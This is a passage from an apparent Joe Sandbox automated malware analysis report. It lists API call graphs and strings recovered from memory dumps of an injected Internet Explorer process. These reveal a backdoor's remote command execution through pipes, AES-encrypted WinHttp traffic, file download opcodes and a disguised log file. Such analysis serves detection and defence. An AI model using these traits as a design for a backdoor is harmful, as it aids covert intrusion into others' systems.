      • Part of subcall function 00515486: strncmp.MSVCRT(?,rundll ,00000007,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 0051555C
      • Part of subcall function 00515486: strstr.MSVCRT ref: 005155DB
      • Part of subcall function 00515486: LoadLibraryA.KERNEL32(?), ref: 005155F9
      • Part of subcall function 00515486: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 0051562D
      • Part of subcall function 00515486: ___swprintf_l.LIBCMT ref: 00515645
      • Part of subcall function 00515486: GetProcAddress.KERNEL32(00000000,00000001,?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001), ref: 00515664
      • Part of subcall function 00515486: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00520110,00000294,005153A6,?,00000001,?,?,00000001), ref: 00515698
      • Part of subcall function 00515486: ___swprintf_l.LIBCMT ref: 005156F8
      • Part of subcall function 00515486: GetSystemDirectoryA.KERNEL32(?,00000200), ref: 00515736
      • Part of subcall function 00515486: CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005157B6
      • Part of subcall function 00515486: GetLastError.KERNEL32 ref: 005157C0
      • Part of subcall function 00515486: ___swprintf_l.LIBCMT ref: 00515808
      • Part of subcall function 00515486: memset.MSVCRT ref: 00515831
      • Part of subcall function 00515486: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 00515896
      • Part of subcall function 00515486: WaitForSingleObject.KERNEL32(?,?), ref: 005158BD
      • Part of subcall function 00515486: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 005158F4
      • Part of subcall function 00515486: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00515922
      • Part of subcall function 00515486: WaitForSingleObject.KERNEL32(?,000003E8), ref: 0051594B
      • Part of subcall function 00515486: memset.MSVCRT ref: 00515964
      • Part of subcall function 00515486: CloseHandle.KERNEL32(?), ref: 0051597A
      • Part of subcall function 00515486: CloseHandle.KERNEL32(?), ref: 00515982
      • Part of subcall function 00515486: CloseHandle.KERNEL32(?), ref: 00515992
      • Part of subcall function 00515486: CloseHandle.KERNEL32(?), ref: 0051599A
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • ??3@YAXPAX@Z.MSVCRT ref: 00515463
      • Part of subcall function 00513455: MultiByteToWideChar.KERNEL32(00000000,00000000,0000C6FF,000000FF,00000000,00000000,00000008,?,0000C6FF,?,?,?,005153ED,0000C6FF,00000000), ref: 0051346E
      • Part of subcall function 00513455: ??_U@YAPAXI@Z.MSVCRT ref: 00513484
      • Part of subcall function 00513455: MultiByteToWideChar.KERNEL32(00000000,00000000,0000C6FF,000000FF,00000000,00000001,?,?,?,005153ED,0000C6FF,00000000), ref: 005134A1
      • Part of subcall function 00513455: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,005153ED,0000C6FF,00000000), ref: 005134B8
      • Part of subcall function 00513455: ??_U@YAPAXI@Z.MSVCRT ref: 005134BE
      • Part of subcall function 00513455: memset.MSVCRT ref: 005134C9
      • Part of subcall function 00513455: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,0000C6FF,00000001,00000000,00000000,?,005153ED,0000C6FF,00000000), ref: 005134E2
      • Part of subcall function 00513455: ??_V@YAXPAX@Z.MSVCRT ref: 005134F5
      • Part of subcall function 00513455: ??_V@YAXPAX@Z.MSVCRT ref: 005134FD
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • ??3@YAXPAX@Z.MSVCRT ref: 00515453
    • ??3@YAXPAX@Z.MSVCRT ref: 0051545C
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    • Send Command Result Data Failed!, xrefs: 00515435
    • Recv CommandList Format Error!, xrefs: 00515471
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00511BD3, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 149
    APIs
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • WinHttpOpen.WINHTTP(00000000,00000001,00000000,00000000,00000000,?,?,00000000), ref: 00511C12
    • memset.MSVCRT ref: 00511C38
    • memset.MSVCRT ref: 00511C56
      • Part of subcall function 00511231: RegQueryValueExW.ADVAPI32(00000000,AutoConfigURL,00000000,00000000,00000400,00000400,?,00000000), ref: 00511257
      • Part of subcall function 00511231: RegCloseKey.ADVAPI32(00000000), ref: 00511260
    • memset.MSVCRT ref: 00511C90
    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000020,?,00000020,?,?,?), ref: 00511CA3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • WinHttpGetProxyForUrl.WINHTTP(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00511D33
    • WinHttpSetOption.WINHTTP(?,00000026,00000003,0000000C,?,?,?,?,?,?,?,?,?), ref: 00511D57
    • GlobalFree.KERNEL32(?), ref: 00511D71
    • GlobalFree.KERNEL32(?), ref: 00511D81
      • Part of subcall function 005121E5: memset.MSVCRT ref: 00512208
      • Part of subcall function 005121E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000020,?,00000020,?,?,00000000), ref: 0051221B
      • Part of subcall function 005121E5: wcsstr.MSVCRT ref: 0051222A
      • Part of subcall function 005121E5: _wtoi.MSVCRT ref: 0051223B
      • Part of subcall function 005121E5: WinHttpConnect.WINHTTP(?,?,00000050,00000000,?,?,00000000), ref: 00512277
      • Part of subcall function 005121E5: GetLastError.KERNEL32(?,?,00000000), ref: 00512284
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051AFD2, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 124sleep
    APIs
    • Sleep.KERNEL32(000003E8), ref: 0051B035
    • InterlockedCompareExchange.KERNEL32(00523E44,?,00000000), ref: 0051B03F
    • _amsg_exit.MSVCRT ref: 0051B05C
    • __initterm_e.LIBCMT ref: 0051B077
    • _initterm.MSVCRT ref: 0051B090
    • InterlockedExchange.KERNEL32(00523E44,00000000), ref: 0051B0A6
    • Sleep.KERNEL32(000003E8), ref: 0051B0DD
    • InterlockedCompareExchange.KERNEL32(00523E44,00000001,00000000), ref: 0051B0E8
    • _amsg_exit.MSVCRT ref: 0051B0FA
    • free.MSVCRT(00472EE0), ref: 0051B127
    • InterlockedExchange.KERNEL32(00523E44,00000000), ref: 0051B149
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005140AA, Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 107
    APIs
    • WinHttpQueryDataAvailable.WINHTTP(?,00000000,?,00000000,?,?), ref: 005140C4
    • GetLastError.KERNEL32 ref: 005140CE
      • Part of subcall function 0051336C: WinHttpReadData.WINHTTP(?,?,?,?,?,?,?,0051410A,?,00000000,00000004), ref: 0051338C
      • Part of subcall function 0051336C: GetLastError.KERNEL32(?,?,0051410A,?,00000000,00000004), ref: 005133A6
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • ??2@YAPAXI@Z.MSVCRT ref: 00514130
    • ??2@YAPAXI@Z.MSVCRT ref: 00514156
      • Part of subcall function 005191BC: ??2@YAPAXI@Z.MSVCRT ref: 00519203
      • Part of subcall function 005191BC: memset.MSVCRT ref: 00519224
      • Part of subcall function 005191BC: memcpy.MSVCRT ref: 0051923B
      • Part of subcall function 005191BC: memcpy.MSVCRT ref: 00519297
      • Part of subcall function 005191BC: ??3@YAXPAX@Z.MSVCRT ref: 005192B2
    • ??3@YAXPAX@Z.MSVCRT ref: 00514181
    • ??3@YAXPAX@Z.MSVCRT ref: 00514188
    • ??3@YAXPAX@Z.MSVCRT ref: 0051419B
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
    • ??3@YAXPAX@Z.MSVCRT ref: 005141C7
    • ??3@YAXPAX@Z.MSVCRT ref: 005141E2
    Strings
    • WinHttpQueryDataAvailable Failed! - %d, xrefs: 005140D5
    • Recv Data Length : %d., xrefs: 00514123
    • AES Decrypt Received Data Fail!, xrefs: 0051418D
    • Receive Data length Not Correct!, xrefs: 005141D4
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00515CDD, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 144
    APIs
    • memset.MSVCRT ref: 00515CFB
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000200,?,?,00000000,005152D8,00000000,?), ref: 00513524
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 0051353A
      • Part of subcall function 0051350A: memset.MSVCRT ref: 00513547
      • Part of subcall function 0051350A: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000001,00000000,005152D8,00000000,?), ref: 0051355D
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00513568
      • Part of subcall function 0051350A: ??_U@YAPAXI@Z.MSVCRT ref: 00513572
      • Part of subcall function 0051350A: memset.MSVCRT ref: 0051357C
      • Part of subcall function 0051350A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 0051358D
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A2
      • Part of subcall function 0051350A: ??_V@YAXPAX@Z.MSVCRT ref: 005135A8
    • ??2@YAPAXI@Z.MSVCRT ref: 00515D57
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000000,00000000), ref: 00515D82
    • CloseHandle.KERNEL32(00000000), ref: 00515D8E
    • memcpy.MSVCRT ref: 00515DA4
    • GetLastError.KERNEL32(?,?,?,?,00000000,000003EB,?,?,?,?,?,00000000), ref: 00515DD1
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A48F
      • Part of subcall function 0051A476: memcpy.MSVCRT ref: 0051A4BB
      • Part of subcall function 0051A476: memset.MSVCRT ref: 0051A4CC
      • Part of subcall function 0051A476: _errno.MSVCRT ref: 0051A4DE
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • ??3@YAXPAX@Z.MSVCRT ref: 00515E78
    Strings
    • CreateFile Error! - %d, xrefs: 00515DDA
    • Send OP_DOWNLOAD_END Data Failed!, xrefs: 00515E5C
    • Send OP_DOWNLOAD_START Data Failed!, xrefs: 00515DC7
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005126EC, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 100
    APIs
    • rand.MSVCRT ref: 00512725
    • memset.MSVCRT ref: 0051274A
    • rand.MSVCRT ref: 0051275D
      • Part of subcall function 005122D3: memset.MSVCRT ref: 00512330
      • Part of subcall function 005122D3: memset.MSVCRT ref: 0051235A
      • Part of subcall function 005122D3: rand.MSVCRT ref: 00512375
      • Part of subcall function 005122D3: ___swprintf_l.LIBCMT ref: 0051238F
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
    • rand.MSVCRT ref: 0051279E
    • rand.MSVCRT ref: 005127C3
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • ___swprintf_l.LIBCMT ref: 005127ED
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 004F382C, Relevance: 16.6, APIs: 11, Instructions: 124sleep
    APIs
    • Sleep.KERNEL32(000003E8), ref: 004F388F
    • InterlockedCompareExchange.KERNEL32(0050264C,?,00000000), ref: 004F3899
    • _amsg_exit.MSVCRT ref: 004F38B6
    • __initterm_e.LIBCMT ref: 004F38D1
    • _initterm.MSVCRT ref: 004F38EA
    • InterlockedExchange.KERNEL32(0050264C,00000000), ref: 004F3900
    • Sleep.KERNEL32(000003E8), ref: 004F3937
    • InterlockedCompareExchange.KERNEL32(0050264C,00000001,00000000), ref: 004F3942
    • _amsg_exit.MSVCRT ref: 004F3954
    • free.MSVCRT(00832388), ref: 004F3981
    • InterlockedExchange.KERNEL32(0050264C,00000000), ref: 004F39A3
    Memory Dump Source
    • Source File: 00000003.00000002.773005659.004F0000.00000040.sdmp, Offset: 004F0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4f0000_iexplore.jbxd
    Function 00511124, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 90registry
    APIs
    • memset.MSVCRT ref: 0051115A
    • RegEnumKeyW.ADVAPI32(80000003,00000000,?,00000104), ref: 0051117D
    • wcsncmp.MSVCRT(S-1-5-21,?,00000008), ref: 00511199
    • wcsstr.MSVCRT ref: 005111B1
    • memset.MSVCRT ref: 005111CF
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051A9D3
      • Part of subcall function 0051A9BB: _errno.MSVCRT ref: 0051AA1C
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
    • RegOpenKeyExW.ADVAPI32(80000003,?,00000000,00020019,?), ref: 00511206
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • S-1-5-21, xrefs: 00511194
    • \Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 005111E5
    • Classes, xrefs: 005111AB
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00515E8D, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 87filesleep
    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00515EBD
    • Sleep.KERNEL32(000003E8,?,?,?,?,?,00000000), ref: 00515ED0
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 00515EE6
    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000000,?,?,?,?,?,00000000), ref: 00515F1C
    • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 00515F2E
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00515F38
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00515F50
    • CloseHandle.KERNEL32(000000FF), ref: 00515F6D
      • Part of subcall function 00515F93: ??2@YAPAXI@Z.MSVCRT ref: 00515FA9
      • Part of subcall function 00515F93: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00515FC9
      • Part of subcall function 00515F93: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00515F8B), ref: 00515FE0
      • Part of subcall function 00515F93: CloseHandle.KERNEL32(00515F8B), ref: 00515FEC
      • Part of subcall function 00515F93: memcpy.MSVCRT ref: 0051603E
      • Part of subcall function 00515F93: memcpy.MSVCRT ref: 00516052
      • Part of subcall function 00515F93: ??3@YAXPAX@Z.MSVCRT ref: 00516087
    Strings
    • Write Download File Error!, xrefs: 00515F43
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 005122D3, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 85
    APIs
    • memset.MSVCRT ref: 00512330
    • memset.MSVCRT ref: 0051235A
    • rand.MSVCRT ref: 00512375
    • ___swprintf_l.LIBCMT ref: 0051238F
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A956
      • Part of subcall function 0051A93E: _errno.MSVCRT ref: 0051A9AD
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
    Strings
    • 0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 005122FF
    • abcdefghijklmnopqrstuvwxyz, xrefs: 00512314
    • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 005122F8
    • 0123456789, xrefs: 00512306
    • ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 0051230D
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00514D05, Relevance: 15.2, APIs: 6, Strings: 4, Instructions: 202
    APIs
    • memset.MSVCRT ref: 00514D3A
      • Part of subcall function 0051494C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0051496C
      • Part of subcall function 0051494C: ReadFile.KERNEL32(00000000,?,00000269,?,00000000), ref: 00514993
      • Part of subcall function 0051494C: CloseHandle.KERNEL32(00000000), ref: 0051499A
      • Part of subcall function 0051494C: ??2@YAPAXI@Z.MSVCRT ref: 005149A7
      • Part of subcall function 0051494C: ??3@YAXPAX@Z.MSVCRT ref: 005149CD
    • GetLastError.KERNEL32(00000001,?,00000000), ref: 00514D50
    • memcpy.MSVCRT ref: 00514DBE
    • memcpy.MSVCRT ref: 00514E2D
    • memcpy.MSVCRT ref: 00514E87
    • memcpy.MSVCRT ref: 00514ED7
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
      • Part of subcall function 0051A460: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0051B495
      • Part of subcall function 0051A460: UnhandledExceptionFilter.KERNEL32(0051E3C8), ref: 0051B4A0
      • Part of subcall function 0051A460: GetCurrentProcess.KERNEL32(C0000409), ref: 0051B4AB
      • Part of subcall function 0051A460: TerminateProcess.KERNEL32(00000000), ref: 0051B4B2
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
      • Part of subcall function 00517FBE: CreateFileA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\FXSAPIDebugLogFile.tmp,40000000,00000001,00000000,00000003,00000000,00000000), ref: 005180AC
      • Part of subcall function 00517FBE: GetFileSize.KERNEL32(00000000,00000000), ref: 005180BB
      • Part of subcall function 00517FBE: SetEndOfFile.KERNEL32(00000000), ref: 005180CC
      • Part of subcall function 00517FBE: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 005180D9
      • Part of subcall function 00517FBE: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00518117
      • Part of subcall function 00517FBE: CloseHandle.KERNEL32(00000000), ref: 0051811E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 0051350A, Relevance: 15.1, APIs: 10, Instructions: 81
    APIs
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000200,?,?,00000000,005152D8,00000000,?), ref: 00513524
    • ??_U@YAPAXI@Z.MSVCRT ref: 0051353A
    • memset.MSVCRT ref: 00513547
    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000001,00000000,005152D8,00000000,?), ref: 0051355D
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00513568
    • ??_U@YAPAXI@Z.MSVCRT ref: 00513572
    • memset.MSVCRT ref: 0051357C
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000), ref: 0051358D
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7B5
      • Part of subcall function 0051A79D: _errno.MSVCRT ref: 0051A7F0
    • ??_V@YAXPAX@Z.MSVCRT ref: 005135A2
    • ??_V@YAXPAX@Z.MSVCRT ref: 005135A8
    Memory Dump Source
    • Source File: 00000003.00000002.773015621.00510000.00000040.sdmp, Offset: 00510000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_510000_iexplore.jbxd
    Function 00515F93, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97
    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00515FA9
    • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00515FC9
    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00515F8B), ref: 00515FE0
    • CloseHandle.KERNEL32(00515F8B), ref: 00515FEC
    • memcpy.MSVCRT ref: 0051603E
    • memcpy.MSVCRT ref: 00516052
      • Part of subcall function 0051476E: rand.MSVCRT ref: 0051479C
      • Part of subcall function 0051476E: ??2@YAPAXI@Z.MSVCRT ref: 005147B4
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 0051481E
      • Part of subcall function 0051476E: ??3@YAXPAX@Z.MSVCRT ref: 00514862
    • ??3@YAXPAX@Z.MSVCRT ref: 00516087
      • Part of subcall function 00517FBE: memset.MSVCRT ref: 00518001
      • Part of subcall function 00517FBE: GetLocalTime.KERNEL32(?,?,0051648E,Client Start!), ref: 00518010
      • Part of subcall function 00517FBE: ___swprintf_l.LIBCMT ref: 00518058
